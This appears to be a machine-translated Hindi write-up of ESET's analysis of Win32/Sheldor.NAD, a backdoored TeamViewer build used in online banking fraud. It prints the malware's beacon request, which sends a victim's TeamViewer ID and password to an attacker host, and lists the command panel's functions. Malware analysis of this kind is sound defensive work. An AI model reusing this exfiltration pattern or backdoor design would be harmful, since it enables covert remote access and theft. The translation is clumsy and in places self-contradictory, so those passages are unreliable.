📂 💴 😭 Win32 / Sheldor.NAD पिछले दरवाजे के एक घटक के रूप में टीम व्यूअर 🏐 👨🏽‍🤝‍👨🏼 🧖🏽

हाल ही में, ESET विश्लेषकों ने एक दिलचस्प मैलवेयर की खोज की - Win32 / Sheldor.NAD, जो दूरस्थ कंप्यूटर प्रशासन के लिए लोकप्रिय सॉफ्टवेयर का एक संशोधन है - टीमव्यूअर।

समूह-आईबी द्वारा शुरू की गई और दूरस्थ बैंकिंग प्रणालियों में धोखाधड़ी से संबंधित घटना की जांच के भाग के रूप में परीक्षा के दौरान यह जानकारी प्राप्त की गई थी। उसी समय, हमलावर कई नकली लेनदेन करने और लगभग 5 मिलियन रूबल चुराने में कामयाब रहे।

Win32 / Sheldor.NAD - ट्रोजन इंस्टॉलर का उपयोग करके स्थापित किया गया है, जो दूरस्थ प्रशासन के लिए लोकप्रिय पैकेज का एक संशोधित संस्करण पेश करता है - सिस्टम में पांचवें संस्करण का TeamViewer। इसके अलावा, कई घटकों में एक कानूनी डिजिटल हस्ताक्षर शामिल हैं:

चूंकि, वास्तव में, इस संशोधित संस्करण में, सभी परिवर्तन tv.dll मॉड्यूल में समाहित हैं, जब हमने इस पिछले दरवाजे की खोज की, तो अधिकांश एंटी-वायरस समाधानों ने इसे नोटिस नहीं किया, क्योंकि कोड का सीधे विश्लेषण किए बिना, यह निर्धारित करना कि यह दुर्भावनापूर्ण कार्यक्रम इतना सरल नहीं था।

अब चीजें बहुत बेहतर हैं - http://www.virustotal.com/file-scan/report.html?id=9f3ff234d5481da1c00a2466bc83f7bda5fb9a36eb00bb0db821a6dc3669fe4e6-129527272165 ।

दुर्भावनापूर्ण प्रोग्राम को स्थापित करने के तुरंत बाद, सर्वर भाग शुरू हो जाता है और फिर साइबर अपराधियों के प्रशासनिक पैनल के साथ लगातार बातचीत होती है जो किसी भी समय संक्रमित कंप्यूटर से जुड़ सकते हैं और उपयोगकर्ता के विशेषाधिकारों के साथ कोई भी कार्य कर सकते हैं जिसके खाते में दुर्भावनापूर्ण प्रोग्राम लॉन्च किया गया था या इसकी निगरानी करें।

व्यवस्थापक पैनल और संक्रमित मशीन के बीच सूचना का आदान-प्रदान मुख्य रूप से निम्नानुसार है:

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP / 1.1

उपयोगकर्ता-एजेंट: x3

होस्ट: goeiuyi.net

जहाँ id = 414 034 883 फ़ील्ड टीमव्यूअर नेटवर्क पर सत्र पहचानकर्ता है, और pwd = 6655 पासवर्ड है। इन दो पहचानकर्ताओं के साथ, आप दुनिया में कहीं से भी दूरस्थ कंप्यूटर से जुड़ सकते हैं। नियंत्रण केंद्र से निम्नलिखित कमांड प्राप्त कर सकते हैं:

निष्पादित - winapi फ़ंक्शन कॉल करता है ShellExecute ()

power_off - EWX_POWEROFF पैरामीटर के साथ winapi फ़ंक्शन ExitWindowsEx () को कॉल करता है

शटडाउन - winapi फ़ंक्शन को ExitWindowsEx () EWX_SHUTDOWN पैरामीटर के साथ कॉल करता है

किलबॉट - सभी स्थापित फ़ाइलों को हटाता है और रजिस्ट्री कुंजियों को साफ करता है

हमलावरों की पसंद टीम व्यूअर प्रोग्राम पर संयोग से नहीं बनी थी, क्योंकि यह सिस्टम प्रशासकों के साथ काफी लोकप्रिय है, और आपको तुरंत किसी चाल पर संदेह नहीं हो सकता। इसके अलावा, रिमोट कंप्यूटर का कनेक्शन टीमव्यूअर के लिए मध्यस्थ सर्वरों के माध्यम से होता है, जो हमलावरों को उनके आईपी पते को छिपाने की अनुमति देता है जिससे कनेक्शन बनाया जाता है। यह एक जांच के लिए कम सबूत भी छोड़ता है, क्योंकि टीमव्यूअर प्रोग्राम के डेवलपर से आवश्यक डेटा का अनुरोध करने की प्रक्रिया बल्कि त्वरित है और इसमें कई महीने लग सकते हैं।

Win32 / Sheldor.NAD पिछले दरवाजे के एक घटक के रूप में टीम व्यूअर

More articles: